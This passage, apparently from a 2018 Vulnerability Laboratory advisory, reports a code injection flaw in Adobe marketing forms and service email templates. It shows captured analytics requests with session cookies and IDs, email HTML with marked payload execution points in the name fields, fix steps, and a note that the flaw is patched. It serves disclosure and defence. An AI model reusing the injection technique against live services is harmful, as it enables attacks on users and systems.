s_iid=70114000002Cc8OAAS; expires=Tue, 20-Mar-2018 11:05:28 GMT; path=/;
domain=offers.adobe.com; secure
s_iid=70114000002Cc8OAAS; expires=Tue, 20-Mar-2018 11:05:28 GMT; path=/;
domain=apps.enterprise.adobe.com; secure
s_cid=7011O000002Oq5lQAC; expires=Tue, 20-Mar-2018 11:05:28 GMT; path=/;
domain=adobe.com; secure
s_cid=7011O000002Oq5lQAC; expires=Tue, 20-Mar-2018 11:05:28 GMT; path=/;
domain=offers.adobe.com; secure
s_cid=7011O000002Oq5lQAC; expires=Tue, 20-Mar-2018 11:05:28 GMT; path=/;
domain=apps.enterprise.adobe.com; secure]
X-Firefox-Spdy[h2]

Status: 200[OK]
POST
https://sstats.adobe.com/b/ss/adbadobefaasprod,adbadobeglobalapp/1/JS-2.5.0/s3118621512273

Mime Type[image/gif]
Request Header:
Host[sstats.adobe.com]
User-Agent[Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:56.0)
Gecko/20100101 Firefox/56.0]
Accept[*/*]
Accept-Language[de,en-US;q=0.7,en;q=0.3]
Accept-Encoding[gzip, deflate, br]

Referer[https://offers.adobe.com/de/de/marketing/landings/digitale_trends_2017.html?gclid=EAIaIQobChMIxam646ev2QIV1sqyCh352QaoEAMYAiAAEgLiEvD_BwE&s_cid=7011O000002Oq5lQAC&s_iid=70114000002Cc8OAAS&sdid=F4KHZX38
&mv=search&edtamo=true&s_kwcid=AL!3085!3!250014124781!b!!g!!content-management-system&ef_id=WoldPwAABEWVCpzB:20180218110223:s]
Content-Length[2181]
Content-Type[text/plain;charset=UTF-8]
Origin[https://offers.adobe.com]
DNT[1]
Connection[keep-alive]
POST-Daten:
AQB[1]
ndh[1]
pf[1]
t[18%2F1%2F2018%2012%3A5%3A28%200%20-60]
mid[70200303268859877472538284957896691642]
aid[2D44AEA10530CAFD-40000305C000F505]
aamlh[6]
ce[UTF-8]
cdp[2]
fpCookieDomainPeriods[2]
pageName[faaswc%3AFaaS%20Form%20Submission]

g[https%3A%2F%2Foffers.adobe.com%2Fde%2Fde%2Fmarketing%2Flandings%2Fdigitale_trends_2017.html%3Fgclid%3D
EAIaIQobChMIxam646ev2QIV1sqyCh352QaoEAMYAiAAEgLiEvD_BwE%26s_cid%3D7011O000002Oq5lQAC%26s_iid%3D
70114000002Cc8OAAS%26sdid%3DF4KHZX38%26mv%3Dsearch%26edtamo%3Dtrue%26s_kwcid%3DAL%213085%213%21250014124781%21]
c.[]
adb.[]
app.[]
name[1]
namespace[faaswc]
category[webComponent]
version[3.0.0]
.app[]
state.[]

location[https%3A%2F%2Foffers.adobe.com%2Fde%2Fde%2Fmarketing%2Flandings%2Fdigitale_trends_2017.html
%3Fgclid%3DEAIaIQobChMIxam646ev2QIV1sqyCh352QaoEAMYAiAAEgLiEvD_BwE%26s_cid%3D7011O000002Oq5lQAC%26s_iid%3D
70114000002Cc8OAAS%26sdid%3DF4KHZX38%26mv%3Dsearch%26edtamo%3Dtrue%26s_kwcid%3DAL%213085%213%21250014124781
%21b%21%21g%21%21content-management-system%26ef_id%3DWoldPwAABEWVCpzB%3A20180218110223%3As]
.state[]
.adb[]
faaswc.[]
form.[]
id[1]
.form[]
.faaswc[]
.c[]
aamb[RKhpRz8krg2tLO6pguXWp5olkAcUniQYPHaMWWgdJ3xzPWQmdj0y]
c36[unspecified]

c37[https%3A%2F%2Foffers.adobe.com%2Fde%2Fde%2Fmarketing%2Flandings%2Fdigitale_trends_2017.html%3Fgclid%3
DEAIaIQobChMIxam646ev2QIV1sqyCh352QaoEAMYAiAAEgLiEvD_BwE%26s_cid%3D7011O000002Oq5lQAC%26s_iid%3D70114000002Cc8O
AAS%26sdid%3DF4KHZX38%26mv%3Dsearch%26edtamo%3Dtrue%26s_kwcid%3DAL%213085%213%21250014124781%21b%21%21g%21%21
content-management-system%26ef_id%3DWoldPwAABEWVCpzB%3A20180218110223%3As]
c38[form_1]
c39[linked_in%7Cjs%7Cfaas_submission%7Csfdc%7Cdemandbase]

c42[%2Fcontent%2Fmicrosites%2Fadobe-offers%2Fde%2Fde%2Fmarketing%2Foffers
%2Fadobe_econsultancy_digital_trends_2017.html%3Ffaas_unique_submission_id%3D78D1E035-F1C6-4261-4EA0-C82041EB2A11]
a.[]
activitymap.[]

page[offers.adobe.com%3Ade%3Ade%3Amarketing%3Alandings%3Adigitale_trends_2017.html]
link[Abschicken]
region[faas-form-1]
pageIDType[1]
.activitymap[]
.a[]
s[1366×768]
c[24]
j[1.8.5]
v[N]
k[Y]
bw[1366]
bh[564]

-g[b%21%21g%21%21content-management-system%26ef_id%3DWoldPwAABEWVCpzB%3A20180218110223%3As]
mcorgid[9E1005A551ED61CA0A490D45%40AdobeOrg]
AQE[1]
Response Header:
Server[Omniture DC/2.0.0]
Access-Control-Allow-Origin[*]
X-C[ms-5.6.0]
Expires[Sat, 17 Feb 2018 11:05:28 GMT]
Last-Modified[Mon, 19 Feb 2018 11:05:28 GMT]
Cache-Control[no-cache, no-store, max-age=0, no-transform, private]
Pragma[no-cache]
ETag[“5A895DF8-FEF7-4E72B58E”]
Vary[*]
P3P[CP=”This is not a P3P policy”]
xserver[www56]
Content-Length[43]
Keep-Alive[timeout=15]
Connection[Keep-Alive]
Content-Type[image/gif]

Status: 200[OK]
GET
https://sstats.adobe.com/b/ss/adbadobenonacdcprod/10/JS-2.5.0-D7QN/s38633784893508?AQB=1&ndh=1&pf=1&callback=s_c_il[1].doPostbacks&et=1&t=18%2F1%2F2018%2012%3A5%3A28%200%20-60&cid.&email_hash.&id=ff01e8531641c6ec1bcec21c031b44eb&as=1&.email_hash&faas_unique_submission_id.&id=78D1E035-F1C6-4261-4EA0-C82041EB2A11&as=1&.faas_unique_submission_id&.cid&d.&nsid=0&jsonv=1&.d&D=D%3D&mid=70200303268859877472538284957896691642&aid=2D44AEA10530CAFD-40000305C000F505&aamlh=6&ce=UTF-8&cdp=2&fpCookieDomainPeriods=2&pageName=offers.adobe.com%3Ade%3Amarketing%3Alandings%3Adigitale_trends_2017&g=https%3A%2F%2Foffers.adobe.com%2Fde%2Fde%2Fmarketing%2Flandings%2Fdigitale_trends_2017.html%3Fgclid%3DEAIaIQobChMIxam646ev2QIV1sqyCh352QaoEAMYAiAAEgLiEvD_BwE%26s_cid%3D7011O000002Oq5lQAC%26s_iid%3D70114000002Cc8OAAS%26sdid%3DF4KHZX38%26mv%3Dsearch%26edtamo%3Dtrue%26s_kwcid%3DAL%213085%213%21250014124781%21&events=event109&v28=offers.adobe.com%2Fde%2Fde%2Fmarketing%2Flandings%2Fdigitale_trends_2017.html&v69=offers.adobe.com%3Ade%3Amarketing%3Alandings%3Adigitale_trends_2017&v87=462&v88=72&v116=1&v147=78D1E035-F1C6-4261-4EA0-C82041EB2A11&v148=ff01e8531641c6ec1bcec21c031b44eb&pe=lnk_o&pev2=FaaS%20Form%20Submission&c.&a.&activitymap.&page=offers.adobe.com%3Ade%3Amarketing%3Alandings%3Adigitale_trends_2017&link=d2d1d3d2A1d1F2d22j1-Abschicken&region=other&pageIDType=1&.activitymap&.a&.c&-g=b%21%21g%21%21content-management-system%26ef_id%3DWoldPwAABEWVCpzB%3A20180218110223%3As&mcorgid=9E1005A551ED61CA0A490D45%40AdobeOrg&AQE=1

Mime Type[application/x-javascript]
Request Header:
Host[sstats.adobe.com]
User-Agent[Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:56.0)
Gecko/20100101 Firefox/56.0]
Accept[*/*]

Referer[https://offers.adobe.com/de/de/marketing/landings/digitale_trends_2017.html?gclid=EAIaIQobChMIxam646ev2QIV1sqyCh352QaoEAMYAiAAEgLiEvD_BwE&s_cid=7011O000002Oq5lQAC&s_iid=70114000002Cc8OAAS&sdid=F4KHZX38&mv=search&edtamo=true&s_kwcid=AL!3085!3!250014124781!b!!g!!content-management-system&ef_id=WoldPwAABEWVCpzB:20180218110223:s]

Cookie[AMCV_9E1005A551ED61CA0A490D45%40AdobeOrg=1406116232%7CMCIDTS%7C17581%7CMCMID%7C70200303268859877472538284957896691642%7CMCAAMLH-1519556547%7C6%7CMCAAMB-1519556547%7CRKhpRz8krg2tLO6pguXWp5olkAcUniQYPHaMWWgdJ3xzPWQmdj0y%7CMCOPTOUT-1518958946s%7CNONE%7CMCAID%7C2D44AEA10530CAFD-40000305C000F505%7CMCSYNCSOP%7C411-17588%7CvVersion%7C2.5.0;
s_pers=%20gpv%3Doffers.adobe.com%253Ade%253Amarketing%253Alandings%253Adigitale_trends_2017%7C1518953545956%3B%20s_nr%3D1518951745958-New%7C1550487745958%3B%20TID%3D-F4KHZX38-%7C1529319749183%3B%20s_vs%3D1%7C1518953728730%3B;
s_sess=%20s_a_campaign%3DF4KHZX38%3B%20s_ppv%3D%255B%2522offers.adobe.com%252Fde%252Fde%252Fmarketing%252Flandings%252Fdigitale_trends_2017.html%2522%252C100%252C0%252C1118%252C1366%252C564%252C1366%252C768%252C1%252C%2522P%2522%255D%3B%20s_cpc%3D1%3B%20s_cc%3Dtrue%3B%20s_sq%3Dadbadobefaasprod%25252Cadbadobeglobalapp%253D%252526c.%252526a.%252526activitymap.%252526page%25253Doffers.adobe.com%2525253Ade%2525253Ade%2525253Amarketing%2525253Alandings%2525253Adigitale_trends_2017.html%252526link%25253D1%252526region%25253Dfaas-form-1%252526pageIDType%25253D1%252526.activitymap%252526.a%252526.c%3B;
AMCVS_9E1005A551ED61CA0A490D45%40AdobeOrg=1; check=true;
s_vi=[CS]v1|2D44AEA10530CAFD-40000305C000F505[CE];
s_iid=70114000002Cc8OAAS; s_cid=7011O000002Oq5lQAC;
mbox=session#e0102d4d21d34f458792072e649f04fb#1518953608|PC#e0102d4d21d34f458792072e649f04fb.26_15#1582196548;
sfdc_session=-; TID=-F4KHZX38-; Fb-Syc=1; AAMC_adobe_0=REGION%7C6;
s_sq=%5B%5BB%5D%5D; faas_form_1_hash=ff01e8531641c6ec1bcec21c031b44eb;
faas_form_1_status=completed]
Connection[keep-alive]
Response Header:
Server[Omniture DC/2.0.0]
Access-Control-Allow-Origin[*]
X-C[ms-5.6.0]
ETag[“5A895DF8-68DE-70672227”]
Vary[*]
P3P[CP=”This is not a P3P policy”]
xserver[www28]
Content-Length[6393]
Keep-Alive[timeout=15]
Connection[Keep-Alive]
Content-Type[application/x-javascript]

Vulnerable Source: Service Email #1 (Test)
<tbody><tr><td class=”mobile-spacer” style=”width:60px;”
width=”60″>&nbsp;</td>
<td class=”headline” style=”color:#2F303D; font-family:serenity,
Helvetica Neue,
Helvetica, Verdana, Arial, sans-serif; font-size:30px; line-height:25px;
padding-top:40px;”
align=”center”><strong>RAGEN SIE HERAUS MIT GROSSARTIGEN
ERLEBNISSEN.</strong></td>
<td class=”mobile-spacer” style=”width:60px;” width=”60″>&nbsp;</td></tr>
<tr><td class=”mobile-spacer” style=”width:60px;” width=”60″>&nbsp;</td>
<td style=”color:#2F303D; font-family:adobe-clean, Helvetica Neue Light,
Helvetica Light,
Helvetica, Verdana, Arial, sans-serif; font-size:16px; font-weight:100;
line-height:19px; padding-top:12px;”
align=”center”>Sehr geehrter Herr “<[PAYLOAD EXECUTION POINT FIRSTNAME &
LASTNAME])” <,<br=””><br>das
Erlebnis w&auml;chst sich gerade zum wichtigsten Faktor bei der
Kundenbindung aus. Erlebnisse, die pers&ouml;nlich,
begeisternd und konsistent auf jedem Kanal und Endger&auml;t sind AC/a!a
das ist jetzt Ihr gr&ouml;AA,ter Wettbewerbsvorteil.
<br><br>Besuchen Sie unseren Adobe Summit EMEA 2018. Erleben Sie bei
uns, was es f&uuml;r auAA,ergew&ouml;hnliche
digitale Erlebnisse wirklich braucht. Erfahren Sie von Unternehmen wie
<strong>Sky, DHL</strong> oder
<strong>Raiffeisen</strong>, wie sie diese neuartigen Erlebnis-Angebote
realisiert haben, die ihre Gesch&auml;ftsmodelle
heute bereits von der Konkurrenz abheben.

Vulnerable Source: Service Email #2 (Test)
<td class=”mobile” style=”display: none; max-height:0; font-size:0;
height:0;padding:0;margin:0;width:0;” valign=”top”>
<a
href=”http://t.info.adobesystems.com//r/?id=h545ac15,8dd8df42,8dd8df46&p1=7011O000002bSn9QAE&p2=0031400002mfNt5AAE”

target=”_blank” style=”color:#0099ff;”><img class=”mobile-image”
alt=”Weil wir innovativ bleiben, liegen wir weiterhin vorne.”
src=”https://www.adobe.com/content/dam/acom/fr/solutions/digital-marketing/events/images/other/49460e.de.because-we-keep-innovating-we-keep-leading.640×597.jpg”

style=”vertical-align:top;
overflow:hidden;display:none;visibility:hidden;width:0;max-height:0;”
width=”320″ vspace=”0″ hspace=”0″ height=”340″ border=”0″>
</a>
</td>
<!–<![endif]–>
</tr>
</tbody></table>
</td>
</tr>
<tr>
<td class=”mobile-padding”
style=”padding-left:30px;padding-right:30px;padding-top:14px;”
valign=”top” bgcolor=”#000000″>
<table style=”mso-cellspacing: 0px; mso-padding-alt: 0px 0px 0px 0px;
width:100%;” width=”100%” cellspacing=”0″ cellpadding=”0″ border=”0″>
<tbody><tr>
<td class=”mobile-text” style=”color:#ffffff; font-family:Arial,
Helvetica, sans-serif; font-size:12px; line-height:18px;
padding-top:12px;” valign=”top”>
Sehr geehrter Herr “%20″[PAYLOAD EXECUTION POINT FIRSTNAME &
LASTNAME],<br=””><br>Forrester stuft Adobe als Leader bei Web-Analysen ein.
Lesen Sie in <i>The Forrester Wave<sup
style=”line-height:95%;”>AC/aAC/</sup>: Web Analytics, Q4 2017</i>, weshalb
wir weiter den Ton angeben
AC/a!a mit aussagekrAA$?ftigen und verwertbaren Einblicken fAA1/4r alle
Mitarbeiter im Unternehmen.
</tr>

Reference(s):
https://www.adobe.com
http://t.info.adobesystems.com
http://m.info.adobesystems.com
https://offers.adobe.com
https://sstats.adobe.com
https://apps.enterprise.adobe.com
http://landing.adobe.com
http://t-info.mail.adobe.com
https://offflivestream.creativecloud.adobeevents.com
https://summit-emea.adobe.com

Solution – Fix & Patch:
=======================
1. Restrict and filter the input fields and disallow usage of script
code tags for inputs
2. Encode the context of the input fields during the post method request
submit to prevent malformed injects
3. Parse the firstname and lastname and company values in outgoing
emails with all adobe service templates
4. Implement a filter mechanism with exception-handling to parse
contents delivered from an external service to the sub-service followed
by the main lead database
5. Provide awareness to employees by explaining the specific impact of
the attack points to prevent the manual delivery
6. Develop a process to remove compromised information from the main
database or backups
7. Ensure that a web-firewall captures those incidents to alert or react
to ensure that an attacker is not able to move through the separate
database segments

The reported urls has been reported and disarmed already by the adobe
systems psirt and developer team. The issue has been patched in multiple
functions.
The forumulars are already restricted and the case scenario has been
full transparent delivered to ensure the problematic becomes visible to
adobe.
(Example:
http://t.info.adobesystems.com//r/?id=h70201f92,8cea7339,8cea7343&p1=%40HeFLnKJ3LTguSxrRQIi3boBCMRBrTTbGPcHOK%2F%2BwiM4%3D)

Security Risk:
==============
The security risk of the arbitrary code injection vulnerability in the
adobe web services are estimated as high.

Credits & Authors:
==================
Benjamin K.M. (Vulnerability Laboratory Core Research
Team)[[email protected]] –
https://www.vulnerability-lab.com/show.php?user=Benjamin+K.M.

Disclaimer & Information:
=========================
The information provided in this advisory is provided as it is without
any warranty. Vulnerability Lab disclaims all warranties, either
expressed or
implied, including the warranties of merchantability and capability for
a particular purpose. Vulnerability-Lab or its suppliers are not liable
in any
case of damage, including direct, indirect, incidental, consequential
loss of business profits or special damages, even if Vulnerability Labs
or its
suppliers have been advised of the possibility of such damages. Some
states do not allow the exclusion or limitation of liability mainly for
incidental
or consequential damages so the foregoing limitation may not apply. We
do not approve or encourage anybody to break any licenses, policies, deface
websites, hack into databases or trade with stolen data. We have no need
for criminal activities or membership requests. We do not publish
advisories
or vulnerabilities of religious-, militant- and racist-
hacker/analyst/researcher groups or individuals. We do not publish trade
researcher mails,
phone numbers, conversations or anything else to journalists,
investigative authorities or private individuals.

Domains: www.vulnerability-lab.com – www.vulnerability-db.com –
www.evolution-sec.com
Programs: vulnerability-lab.com/submit.php –
vulnerability-lab.com/list-of-bug-bounty-programs.php –
vulnerability-lab.com/register.php
Feeds: vulnerability-lab.com/rss/rss.php –
vulnerability-lab.com/rss/rss_upcoming.php –
vulnerability-lab.com/rss/rss_news.php
Social: twitter.com/vuln_lab – facebook.com/VulnerabilityLab –
youtube.com/user/vulnerability0lab

Any modified copy or reproduction, including partially usages, of this
file, resources or information requires authorization from Vulnerability
Laboratory.
Permission to electronically redistribute this alert in its unmodified
form is granted. All other rights, including the use of other media, are
reserved by
Vulnerability Lab Research Team or its suppliers. All pictures, texts,
advisories, source code, videos and other information on this website is
trademark
of vulnerability-lab team & the specific authors or managers. To record,
list, modify, use or edit our material contact ([email protected]) to get an ask
permission.

Copyright A(c) 2018 | Vulnerability Laboratory – [Evolution
Security GmbH]aC/


VULNERABILITY LABORATORY – RESEARCH TEAM
SERVICE: www.vulnerability-lab.com